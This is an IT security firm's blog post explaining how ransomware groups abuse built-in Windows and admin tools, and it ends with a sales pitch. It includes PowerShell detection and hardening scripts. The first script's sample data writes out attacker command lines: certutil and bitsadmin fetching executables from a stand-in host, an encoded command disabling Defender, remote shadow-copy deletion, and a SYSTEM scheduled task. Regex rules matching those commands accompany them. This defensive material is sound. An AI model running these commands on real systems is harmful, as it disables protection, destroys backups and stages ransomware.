Living-Off-the-Land Attacks: How Ransomware Groups Turn Your Own IT Tools Against You

Ransomware groups have stopped smuggling in exotic malware. Instead, they move through your network using tools that were already there when they arrived – remote administration software, scripting engines, built-in Windows utilities – because those tools blend in, generate minimal alerts, and are trusted by the very security controls designed to stop outside threats. Data from CISA advisories published in 2024 and 2025, combined with Sophos incident response reporting, makes one thing clear: living-off-the-land attacks are now the dominant ransomware technique, and conventional defenses routinely miss them.

  1. What Living-Off-the-Land Actually Means
  2. The Specific Tools Ransomware Groups Are Abusing
  3. What 2024 and 2025 CISA Advisories and Sophos Data Reveal
  4. Who Is Most at Risk
  5. Real Attack Chains: How the Sequence Unfolds
  6. The Defense Posture That Actually Works Against Living-Off-the-Land Attacks
  7. What to Ask Your IT Firm Right Now
How ransomware groups weaponize legitimate IT tools during living-off-the-land attacks.

What Living-Off-the-Land Actually Means

The phrase comes from military and survival contexts – sustaining yourself entirely from resources already in the environment, rather than importing supplies. In cybersecurity, living-off-the-land attacks describe adversaries who do exactly that: they gain initial access, then conduct their entire operation using software and utilities that were already present before they arrived.

This is not a niche or emerging technique. The NSA, CISA, FBI, and their counterparts in the UK, Canada, Australia, and New Zealand issued a joint advisory on living-off-the-land tradecraft in May 2023, and followed it in February 2024 with joint guidance on identifying and mitigating living-off-the-land techniques. The warning is the same whether the actor is state-sponsored or financially motivated: they have converged on this approach because it works, and it is hard to detect.

When a security tool sees PowerShell running or a remote desktop session being initiated, it does not automatically flag the activity as malicious. Those actions happen dozens or hundreds of times a day in a healthy IT environment. The attacker’s job is to make malicious commands look like routine administration – and in many small business networks, they succeed for weeks before anyone notices.

The Specific Tools Ransomware Groups Are Abusing


Every tool on this list is likely present in your environment right now. Each one has been documented in CISA advisories or Sophos incident response cases as a vehicle for ransomware staging and deployment.

Windows Built-In Utilities

  • PowerShell – Used to download second-stage payloads, disable Windows Defender, enumerate users and network shares, and run base64-encoded command strings (the -EncodedCommand switch) that defeat naive string matching on the command line. CISA’s 2024 advisory on Black Basta ransomware called out PowerShell abuse as a primary staging mechanism.
  • Windows Management Instrumentation (WMI) – Allows attackers to execute commands on remote systems without dropping files to disk. Because WMI is a core Windows component, most businesses do not restrict it or monitor it for anomalous use.
  • Remote Desktop Protocol (RDP) – Legitimately used by IT teams for remote access. Ransomware groups routinely exploit exposed or weakly authenticated RDP ports as the initial entry point, then use valid credentials to move between machines.
  • Task Scheduler – Used to establish persistence and trigger encryption payloads at a specific time, often overnight or on a weekend when monitoring is lightest.
  • certutil.exe and bitsadmin.exe – Both are Windows command-line utilities used to download files. Attackers use them to pull ransomware components from remote servers because the traffic appears to originate from a trusted Windows process.

Legitimate Third-Party IT Administration Tools

  • PsExec – A free Sysinternals tool used by IT professionals to run processes on remote systems. It is a staple of lateral movement in ransomware incidents. CISA’s advisory on Akira ransomware, published in April 2024, listed PsExec as a key lateral movement mechanism.
  • AnyDesk, TeamViewer, and ScreenConnect – Remote support tools that many small businesses have installed. Sophos incident response data from 2024 found that attackers used legitimate remote access software in over 80 percent of ransomware cases they investigated – not malware, but the same tools your IT vendor uses to fix a printer remotely.
  • Advanced IP Scanner and SoftPerfect Network Scanner – Free network discovery tools used by IT teams for legitimate inventory purposes. Also widely used by ransomware affiliates to map a target network in the first hours after gaining access.
  • Cobalt Strike – Originally a commercial penetration testing framework; cracked and leaked builds circulate on underground markets, and CISA advisories on LockBit, BlackCat (ALPHV), and Royal ransomware all document its use for command and control and post-exploitation.
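
The abuse described in both lists above leaves a recognizable shape on the command line even though the binaries are legitimate. The following is an added example, not code from the original post: a small PowerShell hunting function that applies those patterns to process-creation records and decodes any -EncodedCommand payload it finds. The sample records are constructed to resemble what Sysmon Event ID 1 or Security Event ID 4688 carry; the field names Host, User, Image and CommandLine are assumptions to adapt to your SIEM's schema.

```powershell
# Added example (not from the original post): flag LOLBin abuse patterns in
# process-creation records. Field names are assumed; adapt to your SIEM schema.

# Build the UTF-16LE/base64 payload exactly as -EncodedCommand expects it,
# so the constructed sample is accurate without hand-typed base64.
$encoded = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes('Set-MpPreference -DisableRealtimeMonitoring $true'))

# Constructed sample events: five malicious, one benign helpdesk script.
$sampleEvents = @(
    [pscustomobject]@{ Host='WS-014'; User='CORP\jsmith'; Image='C:\Windows\System32\certutil.exe'
        CommandLine='certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\Users\Public\update.dat' }
    [pscustomobject]@{ Host='WS-014'; User='CORP\jsmith'; Image='C:\Windows\System32\bitsadmin.exe'
        CommandLine='bitsadmin /transfer job1 /download /priority high http://203.0.113.10/a.exe C:\ProgramData\a.exe' }
    [pscustomobject]@{ Host='FS-01'; User='CORP\svc_backup'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine="powershell.exe -nop -w hidden -enc $encoded" }
    [pscustomobject]@{ Host='DC-01'; User='CORP\jsmith'; Image='C:\Windows\System32\wbem\WMIC.exe'
        CommandLine='wmic /node:FS-02 process call create "cmd.exe /c vssadmin delete shadows /all /quiet"' }
    [pscustomobject]@{ Host='FS-01'; User='CORP\jsmith'; Image='C:\Windows\System32\schtasks.exe'
        CommandLine='schtasks /create /tn "Windows Update Check" /tr C:\ProgramData\a.exe /sc once /st 02:00 /ru SYSTEM' }
    [pscustomobject]@{ Host='WS-022'; User='CORP\helpdesk'; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell.exe -File C:\Scripts\Get-PrinterStatus.ps1' }
)

# Match on argument patterns, not on the binary name: the same executables
# run legitimately all day, which is the whole point of living off the land.
$rules = @(
    @{ Name='certutil download';          Pattern='(?i)certutil(\.exe)?\s.*-urlcache' }
    @{ Name='bitsadmin download';         Pattern='(?i)bitsadmin(\.exe)?\s.*/transfer' }
    @{ Name='encoded PowerShell';         Pattern='(?i)powershell(\.exe)?\s.*\s-(e|ec|en|enc|enco|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name='remote WMI process create';  Pattern='(?i)wmic(\.exe)?\s.*/node:.*process\s+call\s+create' }
    @{ Name='scheduled task creation';    Pattern='(?i)schtasks(\.exe)?\s.*/create' }
    @{ Name='shadow copy deletion';       Pattern='(?i)vssadmin.*delete\s+shadows' }
)

function ConvertFrom-EncodedCommand {
    # Returns the plaintext of a -EncodedCommand argument, or $null if absent/invalid.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)\s-(e|ec|en|enc|enco|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return $null }
    }
    return $null
}

function Find-LolbinAbuse {
    # Emits one record per event that matches at least one rule.
    param([object[]]$Events)
    foreach ($e in $Events) {
        $hits = @($rules | Where-Object { $e.CommandLine -match $_.Pattern } | ForEach-Object { $_.Name })
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            Host        = $e.Host
            User        = $e.User
            Rules       = ($hits -join ', ')
            Decoded     = ConvertFrom-EncodedCommand $e.CommandLine
            CommandLine = $e.CommandLine
        }
    }
}

Find-LolbinAbuse -Events $sampleEvents | Format-List Host, User, Rules, Decoded
```

Run as-is on any PowerShell host; the five attacker lines are reported (the WMI line trips two rules, and the encoded PowerShell is shown decoded as the Defender-disabling command), while the helpdesk printer script is not. The decode step matters: without it, a rule that only sees `-enc` tells an analyst nothing about what was run.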

What 2024 and 2025 CISA Advisories and Sophos Data Reveal

The volume and specificity of public threat intelligence available in 2024 and 2025 is unprecedented. CISA has moved from general guidance to publishing detailed technical advisories for specific ransomware groups, complete with the exact tools, techniques, and procedures those groups use. The picture that emerges is consistent across groups and across victim sizes.

CISA’s StopRansomware portal has published or updated advisories on a long list of ransomware families across 2023, 2024, and 2025, including Akira, Black Basta, LockBit 3.0, Medusa, Play, and Rhysida. Each one documents living-off-the-land techniques as a core component of the attack chain. This is not incidental; it is the method.

Sophos’s 2025 Active Adversary Report, drawn from their incident response cases, added quantitative weight to what CISA advisories describe qualitatively. Among the most significant findings:

  • The median dwell time – the window between initial breach and ransomware deployment – dropped to under five days for ransomware cases in 2024. Attackers are moving faster than most small businesses can detect them, even when detection tooling is in place.
  • RDP was the single most abused tool in Sophos’s dataset, appearing in roughly nine out of ten cases: as an entry point through exposed external remote services, and even more often for lateral movement once inside.
  • Legitimate remote access tools were used in the overwhelming majority of cases – not as the initial breach mechanism, but as the persistence and lateral movement mechanism once inside.
  • Attackers disabled or uninstalled security software in a significant portion of cases, often using the same administrative privileges and tools that an IT team would use to manage those products.

The FBI’s Internet Crime Complaint Center 2023 annual report recorded over $59 million in adjusted losses from ransomware complaints – and that figure represents only incidents that were reported to the FBI. The actual economic impact across small businesses is widely understood to be a significant multiple of that number.

Who Is Most at Risk

There is a persistent and dangerous assumption in small business communities that ransomware groups target large enterprises because that is where the money is. That assumption has not been accurate for several years.

Large enterprises invest heavily in detection and response capabilities. Small businesses – particularly those in the 10-to-150 employee range – often have the same IT administration tools installed, the same exposure surface, and dramatically less monitoring capability. For ransomware affiliates working on a volume model, that math is favorable.

The industries appearing most frequently in CISA advisories and Sophos incident data are not surprising: healthcare, professional services (including legal and accounting firms), manufacturing, and financial services. But the more honest framing is this: any business that has not restricted administrative tool usage, has RDP exposed without multi-factor authentication, or relies on a single layer of endpoint protection is in the target population – regardless of industry.

Businesses that have outsourced their IT to a vendor who installed remote administration tools but never restricted or monitored them face a specific risk: the attacker’s footprint looks identical to the IT vendor’s footprint. Without behavioral monitoring and access controls, there is no reliable way to tell the difference – and that is precisely why living-off-the-land attacks are so effective against outsourced IT environments.

Real Attack Chains: How the Sequence Unfolds

The following chain reflects documented techniques from multiple 2024 CISA advisories. It is composite – no specific organizations are identified – but every step in it has been observed in real incidents.

Phase 1 – Initial Access (Hours 0 to 2)

  • An attacker purchases valid credentials for an RDP-exposed server from a dark web credential market – a commodity market that has grown substantially since 2022.
  • They authenticate using legitimate credentials. No malware has been introduced. No alerts fire.
  • They run Advanced IP Scanner to map the network, identifying servers, shared drives, and backup infrastructure.

Phase 2 – Lateral Movement (Hours 2 to 72)

  • Using PsExec, the attacker pushes a small script to additional workstations, establishing footholds across multiple machines simultaneously.
  • PowerShell commands enumerate Active Directory users and groups, identify the highest-privilege accounts, and locate backup servers.
  • AnyDesk or a similar remote access tool is installed silently on several systems, creating persistent access that survives a password reset on the originally compromised account.

Phase 3 – Pre-Deployment Preparation (Hours 72 to 120)

  • Backup systems are identified and deleted, corrupted, or encrypted first – ensuring recovery is impossible or prohibitively expensive without paying the ransom.
  • Windows Defender and any installed endpoint protection are disabled using legitimate administrative commands.
  • Sensitive data – financial records, client files, employee data – is exfiltrated to attacker-controlled cloud storage for use in double-extortion demands.

Phase 4 – Encryption (Typically a Weekend Night)

  • A scheduled task fires at 2:00 AM on a Saturday.
  • The ransomware payload executes across every reachable system simultaneously.
  • By Monday morning, the business cannot open files, access email, or reach its own data. The ransom note is on every desktop.

The entire operation – from initial access to Monday morning’s ransom note – was conducted almost entirely using tools that were already inside the network when the attacker arrived. The weapon is the environment itself.

The Defense Posture That Actually Works Against Living-Off-the-Land Attacks

Defending against living-off-the-land attacks requires a different mental model than traditional perimeter security. The question is not “can we keep attackers out?” but “if an attacker is already inside using legitimate tools, what stops them?” The answer is several overlapping controls – none of which works in isolation.

Restrict What Legitimate Tools Can Do

  • PowerShell should run in Constrained Language Mode for users who do not need full scripting access, enforced through an application control policy (Windows Defender Application Control or AppLocker) rather than the __PSLockdownPolicy environment variable, which an attacker can simply unset. Script block logging and module logging should be enabled on every endpoint, and the legacy PowerShell 2.0 engine, which predates that logging, should be removed.
  • RDP should not be exposed directly to the internet under any circumstances. Access should require a virtual private network layer and multi-factor authentication before an RDP session is even possible.
  • Administrative tools like PsExec should be explicitly allowlisted – only named accounts with a documented business need can run them, and any execution by an unlisted account triggers an alert. PsExec is also noisy if anyone is listening: it installs a service named PSEXESVC on every target it touches, which appears as Event ID 7045 in the target’s System log and is a reliable hunting signal.
  • Remote access software installed by an IT vendor should be inventoried, access-controlled, and monitored. A remote session initiated outside of business hours or from an unfamiliar location should generate an alert within minutes.
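
To turn the PowerShell and RDP items above into something an administrator can check and enforce, here is an added example, not code from the original post. It reads the documented Group Policy registry locations for PowerShell logging and the Terminal Server settings for RDP, reports pass/fail for each control, and optionally enables the logging policies. It must run elevated on Windows; Constrained Language Mode is reported but deliberately not "fixed", because it has to come from a WDAC or AppLocker policy rather than a setting a script can flip. The fDenyTSConnections and UserAuthentication values are the standard locations; whether port 3389 is reachable from the internet still has to be verified from outside.

```powershell
# Added example (not from the original post): audit and enforce the PowerShell
# logging and RDP settings discussed above on the local machine. Run elevated.
# In a domain, set the same keys through Group Policy so they survive reboots
# and cannot be reverted by a local admin (or an attacker holding local admin).

function Get-PolicyValue {
    # Returns a registry value, or $null when the key or value does not exist.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-LotlHardening {
    $psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $ts       = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

    # PowerShell 2.0 engine: its absence is what we want. Requires elevation.
    $v2 = try { (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction Stop).State }
          catch { 'Unknown (run elevated)' }

    @(
        [pscustomobject]@{ Control = 'PowerShell script block logging (Event ID 4104)'
            Pass = (Get-PolicyValue "$psPolicy\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1 }
        [pscustomobject]@{ Control = 'PowerShell module logging (Event ID 4103)'
            Pass = (Get-PolicyValue "$psPolicy\ModuleLogging" 'EnableModuleLogging') -eq 1 }
        [pscustomobject]@{ Control = 'PowerShell transcription'
            Pass = (Get-PolicyValue "$psPolicy\Transcription" 'EnableTranscripting') -eq 1 }
        [pscustomobject]@{ Control = 'PowerShell 2.0 engine removed'
            Pass = $v2 -eq 'Disabled' }
        [pscustomobject]@{ Control = 'Constrained Language Mode in this session'
            Pass = $ExecutionContext.SessionState.LanguageMode -eq 'ConstrainedLanguage' }
        [pscustomobject]@{ Control = 'RDP disabled, or NLA required if enabled'
            Pass = ((Get-PolicyValue $ts 'fDenyTSConnections') -eq 1) -or
                   ((Get-PolicyValue "$ts\WinStations\RDP-Tcp" 'UserAuthentication') -eq 1) }
    )
}

function Enable-PowerShellLogging {
    # Writes the policy values the audit above checks. Idempotent.
    $psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $settings = @(
        @{ Key = "$psPolicy\ScriptBlockLogging"; Name = 'EnableScriptBlockLogging' }
        @{ Key = "$psPolicy\ModuleLogging";      Name = 'EnableModuleLogging' }
        @{ Key = "$psPolicy\Transcription";      Name = 'EnableTranscripting' }
    )
    foreach ($s in $settings) {
        New-Item -Path $s.Key -Force | Out-Null
        Set-ItemProperty -Path $s.Key -Name $s.Name -Value 1 -Type DWord
    }
    # Module logging only records modules listed under ModuleNames; '*' means all.
    $names = "$psPolicy\ModuleLogging\ModuleNames"
    New-Item -Path $names -Force | Out-Null
    Set-ItemProperty -Path $names -Name '*' -Value '*'
    # Transcripts go to each user's Documents folder unless OutputDirectory is
    # set; point it at a write-only network share so attackers cannot prune it.
}

Test-LotlHardening | Format-Table -AutoSize
# To remediate the logging findings, then re-check:
#   Enable-PowerShellLogging; Test-LotlHardening | Format-Table -AutoSize
```

The script block logging key is the one that makes the encoded-command hunting in the earlier example possible at all: without Event ID 4104 the decoded script body never reaches the log, and the only artifact left is the base64 blob on the command line.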

Separate Backup Infrastructure

  • Backups must be stored in a location that is not accessible via the same credentials used to administer production systems. Immutable backup storage – where data cannot be deleted or modified even by an administrator – is the standard that incident-hardened environments use.
  • Recovery from backup should be tested regularly. A backup that has never been tested is an assumption, not a capability.

Behavioral Monitoring

  • Signature-based endpoint protection does not catch living-off-the-land attacks because the tools being used are not malware – they are trusted software. Behavioral monitoring, which watches for anomalous sequences of activity (a user account running PsExec on fifteen machines in three minutes, for example), is the detection layer that matters here.
  • Collecting logs from endpoints, servers, and network infrastructure into a single platform and running automated detections against them is no longer optional for businesses with meaningful data to protect.
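
The "PsExec on fifteen machines in three minutes" pattern above is a correlation, not a signature, and it is simple to express once service-install events from every host land in one place. The following is an added example, not code from the original post: it groups constructed records resembling System log Event ID 7045 (service installed, service name PSEXESVC) by account, slides a time window over each account's activity, and alerts when the number of distinct target hosts in that window crosses a threshold. It also tags whether the burst happened outside business hours, the other signal the post calls out. The record fields Time, Host, Account and ServiceName are assumed names for however your SIEM normalizes 7045.

```powershell
# Added example (not from the original post): detect PsExec fan-out by
# correlating Event ID 7045 (service installed) across hosts. Field names
# are assumed; the events below are constructed for the demonstration.

# Attacker burst: fifteen workstations in 150 seconds, 2 AM on a Saturday.
$base = [datetime]'2025-03-15T02:03:00'
$sampleEvents = @()
1..15 | ForEach-Object {
    $sampleEvents += [pscustomobject]@{
        Time = $base.AddSeconds($_ * 10); Host = ('WS-{0:d3}' -f $_)
        Account = 'CORP\jsmith'; ServiceName = 'PSEXESVC' }
}
# Benign: helpdesk pushing a fix to two machines on a Thursday morning,
# plus an unrelated service install that the PSEXESVC filter must ignore.
$sampleEvents += [pscustomobject]@{ Time = [datetime]'2025-03-13T10:15:00'; Host = 'WS-101'; Account = 'CORP\it-admin'; ServiceName = 'PSEXESVC' }
$sampleEvents += [pscustomobject]@{ Time = [datetime]'2025-03-13T10:16:00'; Host = 'WS-102'; Account = 'CORP\it-admin'; ServiceName = 'PSEXESVC' }
$sampleEvents += [pscustomobject]@{ Time = [datetime]'2025-03-13T10:20:00'; Host = 'WS-103'; Account = 'CORP\it-admin'; ServiceName = 'Spooler' }

function Test-OffHours {
    # Business hours assumed as 07:00-19:00, Monday to Friday (adjust to taste).
    param([datetime]$Time)
    ($Time.DayOfWeek.ToString() -in @('Saturday', 'Sunday')) -or
        $Time.Hour -lt 7 -or $Time.Hour -ge 19
}

function Find-PsExecFanOut {
    # One alert per account whose PSEXESVC installs reach HostThreshold
    # distinct targets inside any WindowMinutes-long window.
    param([object[]]$Events, [int]$WindowMinutes = 3, [int]$HostThreshold = 5)
    $alerts = @()
    # Caveat: PsExec -r renames the service, so pair this with the service
    # image path (PSEXESVC.exe under the ADMIN$ share) and 4624 type-3 logons.
    $psexec = $Events | Where-Object ServiceName -eq 'PSEXESVC'
    foreach ($group in ($psexec | Group-Object Account)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $windowEnd = $sorted[$i].Time.AddMinutes($WindowMinutes)
            $hosts = @($sorted[$i..($sorted.Count - 1)] |
                Where-Object { $_.Time -le $windowEnd } |
                Select-Object -ExpandProperty Host | Sort-Object -Unique)
            if ($hosts.Count -ge $HostThreshold) {
                $alerts += [pscustomobject]@{
                    Account  = $group.Name
                    Start    = $sorted[$i].Time
                    Hosts    = $hosts.Count
                    OffHours = Test-OffHours $sorted[$i].Time
                    HostList = ($hosts -join ', ')
                }
                break   # one alert per account is enough to open a triage
            }
        }
    }
    $alerts
}

Find-PsExecFanOut -Events $sampleEvents | Format-List
```

With the constructed data this raises exactly one alert, for CORP\jsmith, with fifteen hosts and OffHours set, and stays silent for the helpdesk account's two targets. The threshold and window are the tuning knobs: set them just above what your own IT vendor's legitimate pushes look like, which is why the inventory of who is authorized to run these tools has to exist first.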

Least Privilege, Enforced Rigorously

  • Most ransomware lateral movement depends on accounts with excessive privileges – typically domain administrator credentials that have been reused, shared, or poorly protected. A rigorous least-privilege model limits what any single compromised account can reach.
  • Multi-factor authentication on every administrative account, and on every remote access path into the environment, is among the highest-value controls in the current threat landscape. CISA’s ransomware advisories list it as a top mitigation almost without exception. It is non-negotiable.

For a deeper look at how we approach layered cybersecurity for small and mid-size businesses – including behavioral monitoring, managed detection and response, and backup architecture – see our cybersecurity services overview and our managed IT services page.

What to Ask Your IT Firm Right Now

If you are the executive who owns your organization’s technology risk, these questions belong on your agenda with your current IT provider. The answers will tell you more about your actual exposure to living-off-the-land attacks than any marketing language will.

  • Which remote administration tools are installed across our environment, and which accounts are authorized to use them? Can you show me that list?
  • Is RDP exposed directly to the internet on any of our systems? If so, what is the remediation plan and timeline?
  • Do we have multi-factor authentication enforced on every administrative account – including the accounts your team uses to manage our systems?
  • How would you detect if someone used PsExec or PowerShell in an unusual pattern inside our network at 2:00 AM? What would fire an alert, and who would see it?
  • Where are our backups stored, and can an attacker who has compromised our domain administrator account delete or encrypt them?
  • Have you ever tested recovery from a full backup restoration? When was the last time, and how long did it take?
  • If a ransomware group spent 72 hours moving through our network using only tools we already have installed, what in our current setup would catch that before encryption?

An IT firm that cannot answer these questions specifically and confidently has likely not built the layered, behaviorally aware environment the current threat landscape demands. Living-off-the-land attacks succeed not because businesses lack security tools, but because the security architecture was never built with the assumption that attackers would use the IT team’s own toolbox against them.

That assumption needs to change before the ransom note appears on Monday morning. If you want to know where your environment actually stands, Book a Free Cybersecurity Strategy Call – it’s a 20-minute conversation with our team, no obligation.

Copyright © 2026. Website Design by Xact IT Solutions